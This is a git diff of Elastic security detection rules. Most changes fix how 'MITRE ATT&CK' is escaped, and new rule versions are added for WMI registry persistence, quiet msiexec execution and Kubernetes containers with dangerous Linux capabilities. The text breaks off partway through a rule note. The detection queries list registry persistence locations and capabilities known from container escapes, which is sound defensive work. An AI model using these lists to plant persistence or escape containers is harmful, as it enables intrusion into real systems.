diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_106.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_106.json
index 70d6da31e81..932708f800a 100644
--- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_106.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_107.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_107.json
index 16f9c2d14c0..5a6a3a22ca2 100644
--- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_107.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_208.json b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_208.json
index 0b16eed1aa3..7dd2ea1bdf5 100644
--- a/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/7024e2a0-315d-4334-bb1a-552d604f27bc_208.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/708c9d92-22a3-4fe0-b6b9-1f861c55502d_1.json b/packages/security_detection_engine/kibana/security_rule/708c9d92-22a3-4fe0-b6b9-1f861c55502d_1.json
index 698f703cefa..2b70e6e7a96 100644
--- a/packages/security_detection_engine/kibana/security_rule/708c9d92-22a3-4fe0-b6b9-1f861c55502d_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/708c9d92-22a3-4fe0-b6b9-1f861c55502d_1.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Execution via MSIEXEC", - "query": "process where host.os.type == \"windows\" and event.action == \"start\" and\n process.name : \"msiexec.exe\" and user.id : (\"S-1-5-21*\", \"S-1-12-*\") and process.parent.executable != null and\n (\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n process.args : (\"?:\\\\Users\\\\*\", \"?:\\\\ProgramData\\\\*\") and\n not process.parent.executable : (\"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Users\\\\*\\\\Desktop\\\\*\",\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\programdata\\\\*\")) or\n\n (process.args_count == 1 and not process.parent.executable : (\"?:\\\\Windows\\\\explorer.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\explorer.exe\")) or\n\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n (process.parent.args : \"Schedule\" or process.parent.name : \"wmiprvse.exe\" or\n process.parent.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\*\" or\n (process.parent.name : (\"powershell.exe\", \"cmd.exe\") and length(process.parent.command_line) \u003e= 200))) or\n\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n process.working_directory : \"?:\\\\\" and process.parent.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* noisy pattern */\n not (process.parent.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\" and process.parent.args_count \u003e= 2 and\n process.args : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\*.msi\") and\n\n not process.args : (\"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Program Files\\\\*\")\n", + "query": "process where host.os.type == \"windows\" and event.action == \"start\" and\n process.name : \"msiexec.exe\" and user.id : (\"S-1-5-21*\", \"S-1-12-*\") and 
process.parent.executable != null and\n (\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n process.args : (\"?:\\\\Users\\\\*\", \"?:\\\\ProgramData\\\\*\") and\n not process.parent.executable : (\"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Users\\\\*\\\\Desktop\\\\*\",\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\programdata\\\\*\")) or\n\n (process.args_count == 1 and not process.parent.executable : (\"?:\\\\Windows\\\\explorer.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\explorer.exe\")) or\n\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n (process.parent.args : \"Schedule\" or process.parent.name : \"wmiprvse.exe\" or\n process.parent.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\*\" or\n (process.parent.name : (\"powershell.exe\", \"cmd.exe\") and length(process.parent.command_line) >= 200))) or\n\n (process.args : \"/i\" and process.args : (\"/q\", \"/quiet\") and process.args_count == 4 and\n process.working_directory : \"?:\\\\\" and process.parent.name : (\"cmd.exe\", \"powershell.exe\"))\n ) and\n\n /* noisy pattern */\n not (process.parent.executable : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\" and process.parent.args_count >= 2 and\n process.args : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*\\\\*.msi\") and\n\n not process.args : (\"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Program Files\\\\*\")\n", "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/", "https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/" @@ -99,7 +99,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_103.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_103.json
index c166aa23740..6846c9a0fef 100644
--- a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_103.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_104.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_104.json
index 78f621b9332..2173d737bf1 100644
--- a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_104.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_105.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_105.json
index ba2a53a2dbd..0c0f9bf85ba 100644
--- a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_105.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_106.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_106.json
new file mode 100644
index 00000000000..64a5a55252f
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_106.json
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows Management Instrumentation StdRegProv (registry provider) to modify commonly abused registry locations for persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Standard Registry Provider", + "note": "## Triage and analysis\n\n### Investigating Persistence via WMI Standard Registry Provider\n\nThe Windows Management Instrumentation (WMI) StdRegProv is a registry provider that allows users to manage registry keys and values on Windows systems. Adversaries may abuse this functionality to modify registry locations commonly used for persistence, enabling them to maintain unauthorized access to a system.\n\nThis rule identifies instances where the WMI StdRegProv is used to modify specific registry paths associated with persistence mechanisms.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify which process triggered this behavior.\n- Verify whether the file specified in the run key is signed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Examine the file specified in the run key using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' 
OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.data.strings != null and process.name : \"WmiPrvSe.exe\" and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n 
\"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\"\n )\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + }, + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_102.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_102.json index 0a51755fd7d..fbe66dba682 100644 
--- a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_102.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_103.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_103.json
index caf5e3ba335..de641f291ce 100644
--- a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_103.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -79,7 +79,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_104.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_104.json
index 3e626ddb3c0..16f047a5552 100644
--- a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_104.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_105.json b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_105.json
index 3a09a6545ef..57c3009a315 100644
--- a/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/70fa1af4-27fd-4f26-bd03-50b6af6b9e24_105.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_2.json b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_2.json
index 71a4de66253..e47c5956023 100644
--- a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_2.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_3.json b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_3.json
index 44d216a2aa4..51a01157a60 100644
--- a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_3.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_4.json
new file mode 100644
index 00000000000..4f6381c26b1
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/7164081a-3930-11ed-a261-0242ac120002_4.json
@@ -0,0 +1,109 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects a container deployed with one or more dangerously permissive Linux capabilities. An attacker with the ability to deploy a container with added capabilities could use this for further execution, lateral movement, or privilege escalation within a cluster. The capabilities detected in this rule have been used in container escapes to the host machine.",
+ "false_positives": [
+ "Some container images require the addition of privileged capabilities. This rule leaves space for the exception of trusted container images. To add an exception, add the trusted container image name to the query field, kubernetes.audit.requestObject.spec.containers.image."
+ ],
+ "index": [
+ "logs-kubernetes.*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Container Created with Excessive Linux Capabilities",
+ "note": "## Triage and analysis\n\n### Investigating Kubernetes Container Created with Excessive Linux Capabilities\n\nLinux capabilities were designed to divide root privileges into smaller units. Each capability grants a thread just enough power to perform specific privileged tasks. In Kubernetes, containers are given a set of default capabilities that can be dropped or added to at the time of creation. Added capabilities entitle containers in a pod with additional privileges that can be used to change\ncore processes, change network settings of a cluster, or directly access the underlying host. The following have been used in container escape techniques:\n\nBPF - Allow creating BPF maps, loading BPF Type Format (BTF) data, retrieve JITed code of BPF programs, and more.\nDAC_READ_SEARCH - Bypass file read permission checks and directory read and execute permission checks.\nNET_ADMIN - Perform various network-related operations.\nSYS_ADMIN - Perform a range of system administration operations.\nSYS_BOOT - Use reboot(2) and kexec_load(2), reboot and load a new kernel for later execution.\nSYS_MODULE - Load and unload kernel modules.\nSYS_PTRACE - Trace arbitrary processes using 